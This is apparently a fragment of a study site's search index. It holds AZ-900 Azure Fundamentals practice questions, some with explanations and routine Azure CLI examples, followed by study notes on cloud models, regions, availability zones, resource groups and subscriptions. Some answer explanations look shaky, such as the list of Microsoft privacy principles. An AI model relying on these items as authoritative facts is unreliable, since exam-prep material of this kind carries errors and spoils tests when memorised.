        VPN Gateway\u00a0sends encrypted traffic between an Azure virtual network and an on-premises location over the public Internet. You can also use VPN Gateway to send encrypted traffic between Azure virtual networks over the Microsoft network. A VPN gateway is a specific type of virtual network gateway. Each virtual network can have only one VPN gateway. However, you can create multiple connections to the same VPN gateway. When you create multiple connections to the same VPN gateway, all VPN tunnels share the available gateway bandwidth.

        When you configure a virtual network gateway, you configure a setting that specifies the gateway type. The gateway type determines how the virtual network gateway will be used and the actions that the gateway takes. The gateway type 'Vpn' specifies that the type of virtual network gateway created is a 'VPN gateway'. This distinguishes it from an ExpressRoute gateway, which uses a different gateway type. A virtual network can have two virtual network gateways; one VPN gateway and one ExpressRoute gateway. For more information, see\u00a0Gateway types.
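
        A hedged sketch of creating that single VPN gateway for a VNet (assumed names; provisioning typically takes tens of minutes):

        ```bash
        # The gateway needs its own public IP; one VPN gateway per virtual network.
        az network public-ip create --resource-group demo-rg --name gw-pip --sku Standard
        az network vnet-gateway create --resource-group demo-rg --name demo-gw \
          --vnet demo-vnet --gateway-type Vpn --vpn-type RouteBased \
          --sku VpnGw1 --public-ip-addresses gw-pip
        ```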

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-62-which-of-the-following-is-a-benefit-of-using-azure-cloud-shell-for-managing-azure-resources","title":"Question 62:\u00a0 Which of the following is a benefit of using Azure Cloud Shell for managing Azure resources?","text":"
        • It eliminates the need to install and configure command-line interfaces on your local machine
        • It provides faster access to Azure resources
        • It offers more advanced features than other Azure management tools
        • It allows for easier integration with third-party tools and services
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-63-__-is-a-domain-specific-language-dsl-that-uses-declarative-syntax-to-deploy-azure-resources","title":"Question 63:\u00a0__ is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources","text":"
        • Tricep
        • Bicep
        • PHP
        • HTML
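
        The answer is Bicep. A small sketch of working with a Bicep file from the CLI (main.bicep is an assumed file):

        ```bash
        # Compile a Bicep file to the equivalent ARM JSON template...
        az bicep build --file main.bicep

        # ...or deploy it directly; deployment commands accept .bicep files natively.
        az deployment group create --resource-group demo-rg --template-file main.bicep
        ```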
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-64-___-enforcement-is-at-the-center-of-a-zero-trust-architecture","title":"Question 64:\u00a0___ enforcement is at the center of a Zero Trust architecture.","text":"
        • Network
        • Devices
        • Identities
        • Security policy
        • Data
        • Applications

        Security policy enforcement\u00a0is at the center of a Zero Trust architecture. This includes Multi Factor authentication with conditional access that takes into account user account risk, device status, and other criteria and policies that you set.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-65-how-can-you-apply-a-resource-lock-to-an-azure-resource","title":"Question 65:\u00a0How can you apply a resource lock to an Azure resource?","text":"
        • By using the Azure API\u00a0for RBAC
        • By configuring a network security group.
        • By using the Azure portal or Azure PowerShell
        • By assigning a custom role to the resource.
        • By creating a new resource group for the resource.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-66-in-azure-which-of-the-following-services-can-be-accessed-through-private-endpoints","title":"Question 66:\u00a0In Azure, which of the following services can be accessed through private endpoints?","text":"
        • Azure App Service.
        • Azure Storage accounts.
        • Azure SQL Database.
        • All of the above.
        • Azure Key Vault.

        Private endpoints can be used to access various Azure services, including Azure Storage accounts, Azure Key Vault, Azure App Service, and Azure SQL Database. By using private endpoints, you can connect to these services from within your virtual network, ensuring that the traffic remains within the Azure backbone network and doesn't traverse the public internet.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-67-which-of-the-following-scenarios-is-a-suitable-use-case-for-applying-a-resource-lock","title":"Question 67:\u00a0Which of the following scenarios is a suitable use case for applying a resource lock?","text":"
        • Preventing read access to a development virtual machine.
        • Automating the deployment of resources using templates.
        • Ensuring a critical storage account is not accidentally deleted.
        • Restricting network access to an Azure SQL database.
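
        The suitable use case is protecting the critical storage account. A sketch with assumed names of a CanNotDelete lock:

        ```bash
        # Deletion attempts fail while this lock exists, even for owners.
        az lock create --name do-not-delete --lock-type CanNotDelete \
          --resource-group demo-rg --resource-name criticalstorage123 \
          --resource-type Microsoft.Storage/storageAccounts
        ```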
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-68-which-of-the-following-best-describes-the-concept-of-immutable-infrastructure-in-the-context-of-iac","title":"Question 68:\u00a0Which of the following best describes the concept of \"immutable infrastructure\" in the context of IaC?","text":"
        • Infrastructure that is managed through a graphical user interface.
        • Infrastructure that cannot be changed once deployed.
        • Infrastructure that is recreated rather than modified in place.
        • Infrastructure that is stored in a physical data center.

        Immutable infrastructure refers to the practice of recreating infrastructure components whenever changes are needed rather than modifying them in place. This approach aligns with IaC principles, enhancing consistency and reducing configuration drift.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-69-an-____-in-azure-monitor-monitors-your-telemetry-and-captures-a-signal-to-see-if-the-signal-meets-the-criteria-of-a-preset-condition-if-the-conditions-are-met-an-alert-is-triggered-which-initiates-the-associated-action-group","title":"Question 69:\u00a0A(n) ____ in Azure Monitor monitors your telemetry and captures a signal to see if the signal meets the criteria of a preset condition. If the conditions are met, an alert is triggered, which initiates the associated action group.","text":"
        • alert rule
        • preset rule
        • preset condition
        • alert condition

        An\u00a0alert rule\u00a0monitors your telemetry and captures a signal that indicates that something is happening on a specified target. The alert rule captures the signal and checks to see if the signal meets the criteria of the condition. If the conditions are met, an alert is triggered, which initiates the associated action group and updates the state of the alert.
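As a sketch of how a metric alert rule might be created with the Azure CLI (the scope, threshold, and action group are placeholder assumptions):

```bash
# Trigger an alert when average CPU on a VM exceeds 80%
VM_ID=$(az vm show --name vm-demo --resource-group rg-demo --query id --output tsv)

az monitor metrics-alert create \
  --name alert-high-cpu \
  --resource-group rg-demo \
  --scopes "$VM_ID" \
  --condition "avg Percentage CPU > 80" \
  --action ag-ops-team \
  --description "CPU above 80% for the evaluation window"
```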

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-70-as-the-owner-of-a-streaming-platform-deployed-on-azure-you-notice-a-huge-spike-in-traffic-whenever-a-new-web-series-in-released-but-moderate-traffic-otherwise-which-of-the-following-is-a-clear-benefit-of-this-type-of-workload","title":"Question 70:\u00a0As the owner of a streaming platform deployed on Azure, you notice a huge spike in traffic whenever a new web-series in released but moderate traffic otherwise. Which of the following is a clear benefit of this type of workload?","text":"
        • Load balancing
        • Elasticity
        • High availability
        • High latency

Elasticity in this case is the ability to provide additional compute resources when needed (during spikes) and to reduce them when not needed in order to cut costs. Load balancing and high availability are also great advantages the streaming platform would enjoy, but elasticity is the option that best describes the workload in the question. Autoscaling is an example of elasticity.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-71-which-of-the-following-can-repeatedly-deploy-your-infrastructure-throughout-the-development-lifecycle-and-have-confidence-your-resources-are-deployed-in-a-consistent-manner","title":"Question 71:\u00a0Which of the following can repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner?","text":"
        • Azure Resource Manager templates
        • The Azure API Management service
        • Azure Templates
        • Management groups

Azure Resource Manager templates are correct, since templates are idempotent: you can deploy the same template many times and get the same resource types in the same state.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-72-in-the-context-of-infrastructure-as-code-iac-___-are-independent-files-typically-containing-set-of-resources-meant-to-be-deployed-together","title":"Question 72:\u00a0In the context of Infrastructure as Code (IaC), ___\u00a0 are independent files, typically containing set of resources meant to be deployed together.","text":"
        • Methods
        • Modules
        • Units
        • Functions

Modules are independent files, typically containing a set of resources meant to be deployed together. Modules allow you to break complex templates into smaller, more manageable sets of code. You can ensure that each module focuses on a specific task and that all modules are reusable for multiple deployments and workloads. Reference: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/considerations/infrastructure-as-code

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-73-___-service-is-available-to-transfer-on-premises-data-to-blob-storage-when-large-datasets-or-network-constraints-make-uploading-data-over-the-wire-unrealistic","title":"Question 73:\u00a0___ service is available to transfer on-premises data to Blob storage when large datasets or network constraints make uploading data over the wire unrealistic.","text":"
        • Azure Blob Storage
        • Azure FileSync
        • Azure Data Factory
        • Azure Data Box
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-74-which-type-of-resource-lock-allows-you-to-modify-the-resource-but-not-delete-it","title":"Question 74:\u00a0Which type of resource lock allows you to modify the resource, but not delete it?","text":"
        • CanNotModify lock
        • Restrict lock
        • CanNotDelete lock
        • Read-only lock
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-75-your-colleague-is-looking-for-an-azure-service-that-can-help-them-understand-how-their-applications-are-performing-and-proactively-identify-issues-that-affect-them-and-the-resources-they-depend-on-whats-your-recommendation","title":"Question 75:\u00a0Your colleague is looking for an Azure service that can help them understand how their applications are performing and proactively identify issues that affect them , AND the resources they depend on. What's your recommendation?","text":"
        • Azure Monitor
        • Azure Service Health
        • Azure Advisor
        • Azure Comprehend
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-76-which-cloud-deployment-model-is-best-suited-for-organizations-with-extremely-strict-data-security-and-compliance-requirements","title":"Question 76:\u00a0Which cloud deployment model is best suited for organizations with extremely strict data security and compliance requirements?","text":"
        • Community cloud
        • Private cloud
        • Public cloud
        • Hybrid cloud
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-77-if-your-organization-has-many-azure-subscriptions-which-of-the-following-is-useful-to-efficiently-manage-access-policies-and-compliance-for-those-subscriptions","title":"Question 77:\u00a0If your organization has many Azure subscriptions, which of the following is useful to efficiently manage access, policies, and compliance for those subscriptions?","text":"
        • Azure Subscriptions
        • Azure Policy
        • Azure Management Groups
        • Azure Blueprints
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-78-__-allows-you-to-implement-your-systems-logic-into-readily-available-blocks-of-code-that-can-run-anytime-you-need-to-respond-to-critical-events","title":"Question 78:\u00a0__ allows you to implement your system's logic into readily available blocks of code that can run anytime you need to respond to critical events.","text":"
        • Azure Cognitive Services
        • Azure Application Insights
        • Azure Functions
        • Azure Kinect DK
        • Azure Quantum

        Azure Functions provides \"compute on-demand\" in\u00a0two\u00a0significant ways. First, Azure Functions allows you to implement your system's logic into readily available blocks of code. These code blocks are called \"functions\". Different functions can run anytime you need to respond to critical events. Second, as requests increase, Azure Functions meets the demand with as many resources and function instances as necessary - but only while needed. As requests fall, any extra resources and application instances drop off automatically.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-79-you-have-managed-a-web-app-that-you-developed-and-deployed-on-prem-for-a-long-time-but-would-now-like-to-move-it-to-azure-and-relieved-of-all-the-manual-administration-and-maintenance-which-of-the-following-buckets-would-be-most-suitable-for-your-use-case","title":"Question 79:\u00a0You have managed a Web App that you developed and deployed On-Prem for a long time, but would now like to move it to Azure and relieved of all the manual administration and maintenance. Which of the following buckets would be most suitable for your use case?","text":"
        • Platform as a Service (PaaS)
        • Software as a Service (SaaS)
        • Infrastructure as a Service (IaaS)
        • Database as a Service (DaaS)
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-80-microsofts-approach-to-privacy-is-built-on-six-principles-which-of-the-following-is-not-one-of-those-6-principles","title":"Question 80:\u00a0Microsoft's approach to privacy is built on six principles. Which of the following is NOT\u00a0one of those 6 principles?","text":"
        • Transparency
        • Security
        • Strong legal protections
        • Protection
        • Control
        • No content-based targeting

        Microsoft's approach to privacy is built on six principles:

        1. Control: Microsoft provides customers with the ability to control their personal data and how it is used.
        2. Transparency: Microsoft is transparent about the collection, use, and sharing of personal data.
        3. Security: Microsoft takes strong measures to protect personal data from unauthorized access, disclosure, alteration, and destruction.
        4. Strong legal protections: Microsoft complies with applicable laws and regulations, including data protection and privacy laws.
        5. No content-based targeting:\u00a0Microsoft does not use personal data to target advertising to customers based on the content of their communications or files.
        6. Benefits to the customer:\u00a0Microsoft uses personal data to provide customers with valuable products and services that improve their productivity and overall experience.

        Protection is NOT\u00a0one of the principles.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-81-in-the-context-of-azure-networking-what-is-the-purpose-of-a-network-security-group-nsg-associated-with-a-private-endpoint","title":"Question 81:\u00a0In the context of Azure networking, what is the purpose of a Network Security Group (NSG) associated with a private endpoint?","text":"
        • To manage IP address assignments for the private endpoint.
        • To encrypt data traffic between the private endpoint and the Azure service.
        • To ensure the availability and uptime of the private endpoint.
        • To enforce access control rules on inbound and outbound traffic to the private endpoint.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-82-true-or-false-each-zone-is-made-up-of-one-or-more-datacenters-equipped-with-common-power-cooling-and-networking","title":"Question 82:\u00a0True or False: Each zone is made up of one or more datacenters equipped with common power, cooling, and networking.","text":"
        • False
        • True

        Azure Availability Zones are unique physical locations within an Azure region and offer high availability to protect your applications and data from datacenter failures. Each zone is made up of one or more datacenters equipped with\u00a0independent\u00a0power, cooling, and networking.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-83-what-is-the-maximum-number-of-cloud-only-user-accounts-that-can-be-created-in-azure-ad","title":"Question 83:\u00a0What is the maximum number of cloud-only user accounts that can be created in Azure AD?","text":"
        • 100,000
        • 500,000
        • 50,000
        • 1,000,000

        The correct answer is\u00a0 1,000,000. Azure AD has the capability to hold up to\u00a01,000,000 cloud-only user accounts. This limit can be extended further by contacting Microsoft support.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-84-your-organization-uses-microsoft-defender-for-cloud-and-you-receive-an-alert-that-suspicious-activity-has-been-detected-on-one-of-your-cloud-resources-what-should-you-do","title":"Question 84:\u00a0Your organization uses Microsoft Defender for Cloud and you receive an alert that suspicious activity has been detected on one of your cloud resources. What should you do?","text":"
• Delete the cloud resource to prevent the threat from spreading.
• Investigate the alert and take appropriate action to remediate the threat if necessary.
• Wait for a follow-up email from Microsoft Support before taking any action.
• Ignore the alert, as Microsoft Defender for Cloud will automatically handle any threats.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-85-which-of-the-following-resources-can-be-managed-using-azure-arc","title":"Question 85:\u00a0Which of the following resources can be managed using Azure Arc?","text":"
        • Only Kubernetes Clusters and Virtual\u00a0Machines
        • All of these
        • Kubernetes clusters
        • Only Windows and Linux Servers &\u00a0Virtual Machines
        • Virtual machines
        • Windows Server and Linux servers

The answer is: all of these. Azure Arc enables you to manage resources both on-premises and across multiple clouds using a single control plane. This includes managing Windows Server and Linux servers, Kubernetes clusters, and virtual machines. By extending Azure services to hybrid environments, Azure Arc provides consistent management, security, and compliance across all resources.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-preparation/","title":"AZ-900: Notes to get through the Azure Fundamentals Certificate","text":"

        The following notes are derived from the Microsoft e-learning platform. They may not be entirely original, as I've included some paragraphs directly from the Microsoft e-learning platform and some other sources. However, what makes this repository particularly valuable is my effort to enrich and curate the content, along with the addition of valuable tips that can assist anyone in passing the exam.

• Notes taken in: September 2023.
• Certification accomplished on: 23 September 2023.
• Practice tests: practice tests from different sources.

Sources for these notes:

• The Microsoft e-learning platform.
        • Book: \"Microsoft Certified - Azure Fundamentals. Study guide\", by Jim Boyce.
        • Udemy course: AZ-900 Bootcamp: Microsoft Azure Fundamentals.
        • Udemy course: AZ-900 Microsoft Azure Fundamentals Practice Tests, Sep 2023
        • Linkedin course: Exam tips: Microsoft Azure Fundamentals (AZ-900)
        Labs and resources
        • All labs.
        • Deploy a file share in Microsoft Azure
        • Deploy a virtual network in Microsoft Azure
• [Provision a resource group in Azure](https://labitpro.com/provision-a-resource-group-in-azure/)
        • Deploy and configure an Azure Virtual Machine
        • Deploy and configure an Azure Storage Account
        • Deploy and configure a network security group
• [Deploy and configure Azure Bastion](https://labitpro.com/deploy-and-configure-azure-bastion/)
        • Add a Custom Domain to Azure AD
        • Create Users and Groups in Azure AD
        • Configure Self-Service Password Reset in Azure AD
        • Create and Configure an Azure Storage Account
        • Manage Azure Storage Account Access Keys
        • Create an Azure File Share
        • Create and Attach a VM Data Disk
        • Resize an Azure Virtual Machine
        • Create a VM Scale Set in Azure
        • Configure vNet Peering
        • Create and Configure an Azure Recovery Services Vault
        • Managing Users and Groups in Azure AD
        • Practice with a mock exam.
        • AZ-900 crossword puzzle
        • Flashcards
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#basic-cloud-computing-concepts","title":"Basic Cloud Computing concepts","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#shared-responsability-model","title":"Shared responsability model","text":"

Very often, IaaS, PaaS, and SaaS are referred to as the cloud computing stack because, essentially, each is built on top of the other.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cloud-models","title":"Cloud models","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#public-cloud","title":"Public cloud","text":"

        In a public cloud deployment, services are offered over the public internet. These services are available to customers who wish to purchase them. The cloud resources, like servers and storage, are owned and operated by the cloud service provider.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#private-cloud","title":"Private cloud","text":"

        In a private cloud, compute resources are accessed exclusively by users from a single business or organization. You can host a private cloud physically in your own on-prem datacenter, or it can be hosted by a third-party cloud service provider.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#hybrid-cloud","title":"Hybrid cloud","text":"

        A hybrid cloud is a complex computing environment. It combines a public cloud and a private cloud by allowing data and applications to be shared between them. This type of cloud deployment is often utilized by large organizations.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#consumption-based-model","title":"Consumption-Based Model","text":"

        The consumption-based model refers to the way in which organizations only pay for the resources they use. The consumption-based model offers the following benefits:

        • No upfront costs
        • No need to purchase or manage infrastructure
        • Customer pays for resources only when they are needed
        • Customer can stop paying for resources that are no longer needed
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#benefits-of-cloud-computing","title":"Benefits of Cloud Computing","text":"

        Cloud computing offers several key advantages over a physical environment:

        • High availability: Cloud-based apps can provide a continuous user experience with virtually no downtime.
        • Scalability: Apps in the cloud can scale vertically and horizontally. When scaling vertically, compute capacity is added by adding RAM or CPUs to a virtual machine. When scaling horizontally, compute capacity is increased by adding instances of resources, such as adding VMs to a configuration.
        • Elasticity: Allows you to configure apps to autoscale so they always have the resources they need.
        • Agility: Deploy and configure cloud-based resources quickly as requirements change.
        • Geo-distribution: Deploy apps to regional datacenters so that customers always have the best performance in their specific region.
        • Disaster recovery: Cloud-based backup services, data replication, and geo-distribution allow you to deploy apps and know that their data is safe in the event of disaster.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#capital-expenses-vs-operating-expenses","title":"Capital Expenses vs. Operating Expenses","text":"

        Organizations have to think about two different types of expenses:

        • Capital Expenditure (CapEx): The spending of money up-front on physical infrastructure. These expenses are deducted over time.
        • Operational Expenditure (OpEx): The spending of money on services or products now and being billed for them now. These expenses are deducted in the same year they are incurred. Most cloud services are considered OpEx.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#the-cloud-computing-stack","title":"The Cloud Computing stack","text":"

        Before delving deeper, I would like to share this highly informative chart depicting Azure services and their position within the cloud computing stack.

        After this, let's start with the stack!

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#infrastructure-as-a-service-iaas","title":"Infrastructure-as-a-Service (IaaS)","text":"

        Migrating to IaaS helps reduce the need for maintenance of on-prem data centers and allows organizations to save money on hardware costs. IaaS solutions allow organizations to scale their IT resources up and down with demand, while also allowing them to quickly provision new applications and increase the reliability of their underlying infrastructure.

        1. One common business scenario and use case for IaaS is Lift-and-Shift Migration:

• Migrate apps and workloads to the cloud.
• Increase scale and performance.
• Enhance security.
• Reduce costs without refactoring the application.

        2. Another common use case is Storage, backup, and recovery:

• Avoid capital outlay for storage and the complexity of storage management.
• IaaS is useful for handling unpredictable demand and steadily growing storage needs.
• Simplify planning and management of backup and recovery.

3. Web apps: IaaS provides all the infrastructure needed to support web apps: storage, web and application servers, and networking resources. Web apps are quickly deployable, and the infrastructure easily scales up and down.

4. High-performance computing.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#platform-as-a-service-paas","title":"Platform-as-a-Service (PaaS)","text":"

Basically, PaaS is a complete development and deployment environment in the cloud. It includes servers, storage, networking, middleware, development tools, BI services, database management systems, and more. PaaS supports the complete web application lifecycle. You manage the applications and services, and the service provider manages everything else.

Platform-as-a-Service is a complete development and deployment environment in the cloud. It can be used to deploy simple cloud-based apps and complex cloud-enabled enterprise applications. When leveraging PaaS, you purchase the resources you need from your cloud service provider on a pay-as-you-go basis. The resources you purchase are accessed over a secure Internet connection.

        PaaS resources include the same resources included in IaaS (servers, storage, and networking) PLUS things like middleware, development tools, business intelligence services, and database management systems.

It's important to remember that PaaS is designed to support the complete web application lifecycle. It allows organizations to avoid the expense of buying and managing software licenses, underlying infrastructure and middleware, container orchestrators, and development tools.

        Ultimately, when leveraging PaaS offerings, you manage the applications and services, while the cloud service provider manages everything else.

1. One common business scenario and use case for PaaS is a development framework: a framework, provided by Azure, that developers can use to develop or customize cloud-based applications.

        2. Analytics and BI: tools provided as a service with PaaS.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#software-as-a-service-saas","title":"Software-as-a-Service (SaaS)","text":"

        Software-as-a-Service allows users to connect to cloud-based apps over the Internet. Microsoft Office 365 is a good example of SaaS in action. Gmail would be another good example. SaaS provides a complete software solution that\u2019s purchased on a pay-as-you-go basis from a cloud service provider. It\u2019s essentially the rental of an app, that users can then connect to over the Internet, via a web browser. The underlying infrastructure, middleware, app software, and app data for a SaaS solution are all hosted in the provider\u2019s data center, which means the service provider is responsible for managing the hardware and software. SaaS allows organizations to get up and running quickly, with minimal upfront cost.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#architectural-components","title":"Architectural components","text":"

        The core architectural components of Azure may be broken down into two main groupings: the physical infrastructure, and the management infrastructure.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#physical-infrastructure","title":"Physical infrastructure","text":"

The physical infrastructure for Azure starts with datacenters. Conceptually, the datacenters are the same as large corporate datacenters. They're facilities with resources arranged in racks, with dedicated power, cooling, and networking infrastructure. Individual datacenters aren't directly accessible. Datacenters are grouped into Azure regions or Azure availability zones.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-region","title":"Azure Region","text":"

        A region is a geographical area that contains at least one (but potentially multiple) datacenters that are networked together with a low-latency network.

Every Azure region is paired with another region within the same geography (i.e., US, Europe, or Asia) at least 300 miles away in order to allow replication of resources across that geography. Replicating resources across region pairs helps reduce interruptions due to events like natural disasters, civil unrest, power outages, or physical network outages, since such events rarely affect both regions at once.

Some services or features are only available in certain regions. Others don't require you to select a specific region. For instance: Azure Active Directory, Azure Traffic Manager, or Azure DNS.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#availability-zones","title":"Availability zones","text":"

Availability zones are physically separate datacenters within an Azure region. Each availability zone is made up of one or more datacenters equipped with independent power, cooling, and networking. In essence, an availability zone is designed to be an isolation boundary: if one zone goes down, the others continue working.

        Availability zones are designed primarily for VMs, managed disks, load balancers, and SQL databases. It is important to remember that availability zones are connected through private high-speed fiber-optic networks. The image below shows what availability zones look like within a region:

        To ensure resiliency, a minimum of three separate availability zones are present in all availability zone-enabled regions. However, not all Azure Regions currently support availability zones.

        Azure services that support availability zones fall into three categories:

        • Zonal services: You pin the resource to a specific zone (for example, VMs, managed disks, IP addresses).
        • Zone-redundant services: The platform replicates automatically across zones (for example, zone-redundant storage, SQL Database).
        • Non-regional services: Services are always available from Azure geographies and are resilient to zone-wide outages as well as region-wide outages.
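For example, a zonal service such as a VM can be pinned to a specific availability zone at creation time. A minimal Azure CLI sketch (the image alias and names are placeholders):

```bash
# Pin a VM to availability zone 1 of the selected region
az vm create \
  --resource-group rg-demo \
  --name vm-zonal \
  --image Ubuntu2204 \
  --zone 1 \
  --admin-username azureuser \
  --generate-ssh-keys
```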
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#region-pairs","title":"Region pairs","text":"

        Each Azure region is paired with another region within the same geography at least 300 miles away. This is done to allow for the replication of resources across a geography and reduce the chance of unavailability. West US region is, for instance, paired with East US.

        If an outage occurs: one region is prioritized to make sure that at least one is restored as quickly as possible. It also does so to minimize downtime. Data continues to reside within the same geography as its pair (except for Brazil South) for tax -and law- enforcement jurisdiction purposes.

Most regions are paired in two directions, meaning they are the backup for the region that provides a backup for them (West US and East US back each other up). However, some regions, such as West India and Brazil South, are paired in only one direction. In a one-directional pairing, the primary region does not serve as backup for its secondary region: West India's secondary region is South India, but South India's secondary region is Central India, not West India. Brazil South is unique because it's paired with a region outside of its geography: its secondary region is South Central US, while the secondary region of South Central US isn't Brazil South.

        Sovereign regions

In addition to regular regions, Azure also has sovereign regions. Sovereign regions are instances of Azure that are isolated from the main instance of Azure. You may need to use a sovereign region for compliance or legal purposes. Azure sovereign regions include:

• US DoD Central, US Gov Virginia, US Gov Iowa, and more: these regions are physical and logical network-isolated instances of Azure for U.S. government agencies and partners. These datacenters are operated by screened U.S. personnel and include additional compliance certifications.
• China East, China North, and more: these regions are available through a unique partnership between Microsoft and 21Vianet, whereby Microsoft doesn't directly maintain the datacenters.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#management-infrastructure","title":"Management infrastructure","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resources-and-resource-groups","title":"Azure Resources and Resource Groups","text":"

        A resource is the basic building block of Azure. Anything you create, provision, deploy, etc. is a resource. Virtual Machines (VMs), virtual networks, databases, cognitive services, etc. are all considered resources within Azure.

        Resource groups are simply groupings of resources. When you create a resource, you\u2019re required to place it into a resource group. While a resource group can contain many resources, a single resource can only be in one resource group at a time. Some resources may be moved between resource groups, but when you move a resource to a new group, it will no longer be associated with the former group. Additionally, resource groups can't be nested, meaning you can\u2019t put resource group B inside of resource group A.
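A minimal Azure CLI sketch of working with resource groups (names and location are placeholders):

```bash
# Create a resource group and inspect what it contains
az group create --name rg-demo --location westeurope
az resource list --resource-group rg-demo --output table

# Deleting the group deletes every resource inside it
az group delete --name rg-demo --yes
```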

If you grant or deny access to a resource group, you've granted or denied access to all the resources within the resource group. When deleting a resource group, all resources included in it will be deleted, so it makes sense to organize your resource groups by similar lifecycle, or by function.

        A resource group can be used to scope access control for administrative actions. To manage a resource group, you can assign\u00a0Azure Policies,\u00a0Azure roles, or\u00a0resource locks.

        You can\u00a0apply tags\u00a0to a resource group. The resources in the resource group don't inherit those tags.

        You can deploy up to 800 instances of a resource type in each resource group. Some resource types are\u00a0exempt from the 800 instance limit. For more information, see\u00a0resource group limits.

        When you create a resource group, you need to provide a location for that resource group. You may be wondering, \"Why does a resource group need a location? And, if the resources can have different locations than the resource group, why does the resource group location matter at all?\". The resource group stores metadata about the resources. When you specify a location for the resource group, you're specifying where that metadata is stored. For compliance reasons, you may need to ensure that your data is stored in a particular region. If a resource group's region is temporarily unavailable, you can't update resources in the resource group because the metadata is unavailable.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-subscription","title":"Azure Subscription","text":"

        An Azure subscription provides authenticated and authorized access to Azure products and services and allows organizations to provision cloud resources. Every Azure subscription links to an Azure account.

        In Azure, subscriptions are a unit of management, billing, and scale.

        An account can have multiple subscriptions, but it\u2019s only required to have one. In a multi-subscription account, you can use the subscriptions to configure different billing models and apply different access-management policies.

        You can use Azure subscriptions to define boundaries around Azure products, services, and resources. There are two types of subscription boundaries that you can use:

        • Billing boundary: This subscription type determines how an Azure account is billed for using Azure. You can create multiple subscriptions for different types of billing requirements. Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs.
        • Access control boundary: Azure applies access-management policies at the subscription level, and you can create separate subscriptions to reflect different organizational structures. An example is that within a business, you have different departments to which you apply distinct Azure subscription policies. This billing model allows you to manage and control access to the resources that users provision with specific subscriptions.

        Use cases for creating additional subscriptions:

        • To separate Environments: separate environments for development and testing, security, or to isolate data for compliance reasons. This design is particularly useful because resource access control occurs at the subscription level.
        • To separate Organizational structures: you could limit one team to lower-cost resources, while allowing the IT department a full range. This design allows you to manage and control access to the resources that users provision within each subscription.
        • To separate Billing: For instance, you might want to create one subscription for your production workloads and another subscription for your development and testing workloads.

After you've created an Azure account, you're free to create additional subscriptions. After you've created an Azure subscription, you can start creating Azure resources within each subscription.
